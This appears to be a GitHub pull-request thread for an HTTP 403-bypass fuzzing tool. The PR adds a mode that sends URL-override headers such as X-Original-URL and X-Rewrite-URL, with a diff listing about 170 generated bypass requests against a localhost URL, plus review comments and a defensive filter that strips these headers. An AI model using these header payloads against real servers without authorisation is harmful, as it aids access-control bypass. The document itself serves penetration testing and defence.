@jtof-fap
Collaborator

Hey hey!

Another PR, it's been a long time!

Small tweaks for code cleaning and performance:

  • Use the * operator to make a list of tuples
  • Use sets in bypass_modes and http_versions
  • Use literals for dictionary declaration :-)

Added support for a new bypass mode -m http_headers_url:

26 new headers supposed to take a URL as argument (*URL, *URI, *Path, Referer, etc.) and approximately 170 additional bypass requests.

Fuzzing approach for this new mode. For example, for X-Original-URL on the http://127.0.0.1:8000/foo/bar URL:

@jtof-fap jtof-fap requested a review from laluka November 21, 2022 09:11
@jtof-fap
Collaborator Author

Diff of bup-payloads-2022-11-21.lst file with previous version:

diff --git a/tests-history/bup-payloads-2022-10-06.lst b/tests-history/bup-payloads-2022-11-21.lst
index 000cb1a..af485f4 100644
--- a/tests-history/bup-payloads-2022-10-06.lst
+++ b/tests-history/bup-payloads-2022-11-21.lst
@@ -1,5 +1,5 @@

-Bypasser has generated 3044 payloads for 'http://127.0.0.1:8000/foo/bar' url:
+Bypasser has generated 3213 payloads for 'http://127.0.0.1:8000/foo/bar' url:
 [case_substitution] http://127.0.0.1:8000/Foo/bar
 [case_substitution] http://127.0.0.1:8000/fOo/bar
 [case_substitution] http://127.0.0.1:8000/foO/bar
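Review bot: on the summary line the total goes from 3044 to 3213, a difference of 169, which is exactly the number of lines the next hunk adds (6 to 175), so the figure can be stated as 169 rather than "approximately 170" in the description. Since this file is a dated snapshot, a one-line note that the count change comes only from the new mode would save readers from diffing the rest.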
@@ -2048,6 +2048,175 @@ Bypasser has generated 3044 payloads for 'http://127.0.0.1:8000/foo/bar' url:
 [http_headers_scheme] -H X-Url-Scheme: http http://127.0.0.1:8000/foo/bar
 [http_headers_scheme] -H X-Url-Scheme: https http://127.0.0.1:8000/foo/bar
 [http_headers_scheme] -H X-Url-Scheme: webdav http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Base-URL: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Base-URL: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Base-URL: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H Base-URL: http://127.0.0.1:8000/ http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Base-URL: http://127.0.0.1:8000/foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Base-URL: http://127.0.0.1:8000/foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H Http-URL: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Http-URL: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Http-URL: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H Http-URL: http://127.0.0.1:8000/ http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Http-URL: http://127.0.0.1:8000/foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Http-URL: http://127.0.0.1:8000/foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H Original-Path: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Original-Path: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Original-Path: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H Original-URL: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Original-URL: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Original-URL: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H Original-URL: http://127.0.0.1:8000/ http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Original-URL: http://127.0.0.1:8000/foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Original-URL: http://127.0.0.1:8000/foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H Path: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Path: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Path: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H Proxy-Request-FullURI: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Proxy-Request-FullURI: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Proxy-Request-FullURI: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H Proxy-Request-FullURI: http://127.0.0.1:8000/foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H Proxy-URL: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Proxy-URL: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Proxy-URL: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H Proxy-URL: http://127.0.0.1:8000/ http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Proxy-URL: http://127.0.0.1:8000/foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Proxy-URL: http://127.0.0.1:8000/foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H Referer: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Referer: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Referer: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H Referer: http://127.0.0.1:8000/ http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Referer: http://127.0.0.1:8000/foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Request-URI: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Request-URI: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Request-URI: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H Request-URI: http://127.0.0.1:8000/foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H URI: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H URI: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H URI: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H URL: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H URL: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H URL: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H URL: http://127.0.0.1:8000/ http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H URL: http://127.0.0.1:8000/foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H URL: http://127.0.0.1:8000/foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Accel-Redirect: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Accel-Redirect: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Accel-Redirect: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Cf-URL: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Cf-URL: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Cf-URL: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Cf-URL: http://127.0.0.1:8000/ http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Cf-URL: http://127.0.0.1:8000/foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Cf-URL: http://127.0.0.1:8000/foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Envoy-Original-Path: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Envoy-Original-Path: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Envoy-Original-Path: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Flx-Redirect-URL: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Flx-Redirect-URL: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Flx-Redirect-URL: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Flx-Redirect-URL: http://127.0.0.1:8000/ http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Flx-Redirect-URL: http://127.0.0.1:8000/foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Flx-Redirect-URL: http://127.0.0.1:8000/foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Forwarded-Path: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Forwarded-Path: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Forwarded-Path: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Forwarded-URI: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Forwarded-URI: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Forwarded-URI: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Forwarded-URL: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Forwarded-URL: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Forwarded-URL: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Forwarded-URL: http://127.0.0.1:8000/ http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Forwarded-URL: http://127.0.0.1:8000/foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Forwarded-URL: http://127.0.0.1:8000/foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-HTTP-DestinationURL: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-HTTP-DestinationURL: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-HTTP-DestinationURL: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-HTTP-DestinationURL: http://127.0.0.1:8000/ http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-HTTP-DestinationURL: http://127.0.0.1:8000/foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-HTTP-DestinationURL: http://127.0.0.1:8000/foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-HTTP-Path-Override: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-HTTP-Path-Override: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-HTTP-Path-Override: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-MS-Endpoint-Absolute-Path: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-MS-Endpoint-Absolute-Path: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-MS-Endpoint-Absolute-Path: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Ning-Request-URI: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Ning-Request-URI: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Ning-Request-URI: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Ning-Request-URI: http://127.0.0.1:8000/foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Original-Path: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Original-Path: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Original-Path: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Original-URI: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Original-URI: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Original-URI: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Original-URL: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Original-URL: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Original-URL: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Original-URL: http://127.0.0.1:8000/ http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Original-URL: http://127.0.0.1:8000/foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Original-URL: http://127.0.0.1:8000/foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Override-URL: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Override-URL: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Override-URL: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Override-URL: http://127.0.0.1:8000/ http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Override-URL: http://127.0.0.1:8000/foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Override-URL: http://127.0.0.1:8000/foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Path: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Path: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Path: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Proxy-Request: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Proxy-Request: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Proxy-Request: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Proxy-Request: http://127.0.0.1:8000/foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Proxy-URL: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Proxy-URL: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Proxy-URL: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Proxy-URL: http://127.0.0.1:8000/ http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Proxy-URL: http://127.0.0.1:8000/foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Proxy-URL: http://127.0.0.1:8000/foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Referer: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Referer: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Referer: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Referer: http://127.0.0.1:8000/ http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Referer: http://127.0.0.1:8000/foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Referrer: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Referrer: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Referrer: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Referrer: http://127.0.0.1:8000/ http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Referrer: http://127.0.0.1:8000/foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Rewrite-URI: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Rewrite-URI: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Rewrite-URI: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Rewrite-URL: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Rewrite-URL: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Rewrite-URL: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Rewrite-URL: http://127.0.0.1:8000/ http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Rewrite-URL: http://127.0.0.1:8000/foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Rewrite-URL: http://127.0.0.1:8000/foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Route-Request: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Route-Request: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Route-Request: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Route-Request: http://127.0.0.1:8000/foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Sendfile: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Sendfile: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Sendfile: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Sendfile: http://127.0.0.1:8000/foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-URI: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-URI: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-URI: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-URL: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-URL: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-URL: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-URL: http://127.0.0.1:8000/ http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-URL: http://127.0.0.1:8000/foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-URL: http://127.0.0.1:8000/foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Wap-Profile: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Wap-Profile: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Wap-Profile: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Wap-Profile: http://127.0.0.1:8000/foo/bar http://127.0.0.1:8000/
 [http_methods] -X ACL http://127.0.0.1:8000/foo/bar
 [http_methods] -X BIND http://127.0.0.1:8000/foo/bar
 [http_methods] -X CHECKIN http://127.0.0.1:8000/foo/bar
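Review bot: the number of values per header is not uniform in the added [http_headers_url] lines and nothing visible explains the rule: path-style names such as Path and X-Original-URI get three values, Request-URI and X-Sendfile get four, Referer, X-Referer and X-Referrer get five (no full-URL value sent against the root request), and the *-URL names get six. Please document the grouping next to the header list, for instance one comment per group, so a later addition lands in the right set. The lines also carry 38 distinct header names while the description speaks of 26 new headers; the description should say how the two figures relate.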

@laluka
Owner

laluka commented Nov 21, 2022

Awesome addon man!
What's the matter with the { to [ change? What's the gain?
Is the mode also invoked by default when "all" is being used?

@jtof-fap
Collaborator Author

On the performance side there is no significant change, but since the last commit, whenever I can use a set instead of a list in a loop, I don't hesitate anymore :-) I had coded this just after the last PR.

The new mode is invoked by default:
if any(mode in {"all", "http_headers_url"} for mode in self.current_bypass_modes):

@jtof-fap jtof-fap merged commit b5d6a98 into main Nov 21, 2022
@jtof-fap jtof-fap deleted the jtof-fap-header-url branch November 21, 2022 09:41
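
As an added example (not part of the PR or the project's code), a defensive counterpart to the `http_headers_url` mode discussed above: a filter for an edge proxy or application middleware that drops client-supplied URL-override headers and records those naming a different path than the request line. The header subset, the `audit_request` and `header_path` names and the sample requests are assumptions made for the illustration.

```python
from urllib.parse import urlsplit

# Constructed subset of the header names in the diff above, lower-cased.
# Referer is left out on purpose: browsers send it legitimately.
URL_OVERRIDE_HEADERS = frozenset({
    "x-original-url", "x-rewrite-url", "x-override-url", "x-forwarded-url",
    "x-original-uri", "x-rewrite-uri", "x-forwarded-uri", "x-original-path",
    "x-forwarded-path", "x-http-path-override", "x-envoy-original-path",
    "x-accel-redirect", "x-sendfile",
})


def header_path(value):
    """Path component of a header value given as a path or an absolute URL."""
    return urlsplit(value.strip()).path or "/"


def audit_request(request_path, headers):
    """Strip URL-override headers from one inbound request.

    Returns (sanitized_headers, findings). A finding is recorded when a
    stripped header names a path other than the one in the request line,
    i.e. the path the access-control rule was evaluated against.
    """
    sanitized, findings = {}, []
    for name, value in headers.items():
        if name.lower() not in URL_OVERRIDE_HEADERS:
            sanitized[name] = value
            continue
        claimed = header_path(value)
        if claimed != request_path:
            findings.append((name, request_path, claimed))
    return sanitized, findings


# Constructed requests shaped like the [http_headers_url] lines above.
SAMPLES = [
    ("/", {"Host": "127.0.0.1:8000", "X-Original-URL": "/foo/bar"}),
    ("/foo/bar", {"X-Rewrite-URL": "http://127.0.0.1:8000/foo",
                  "Referer": "http://127.0.0.1:8000/"}),
    ("/foo/bar", {"Host": "127.0.0.1:8000", "Accept": "*/*"}),
]

if __name__ == "__main__":
    for path, hdrs in SAMPLES:
        kept, found = audit_request(path, hdrs)
        print(path, sorted(kept), found)
```

The findings list is what a detection rule would alert on; the sanitized headers are what should be forwarded to the backend.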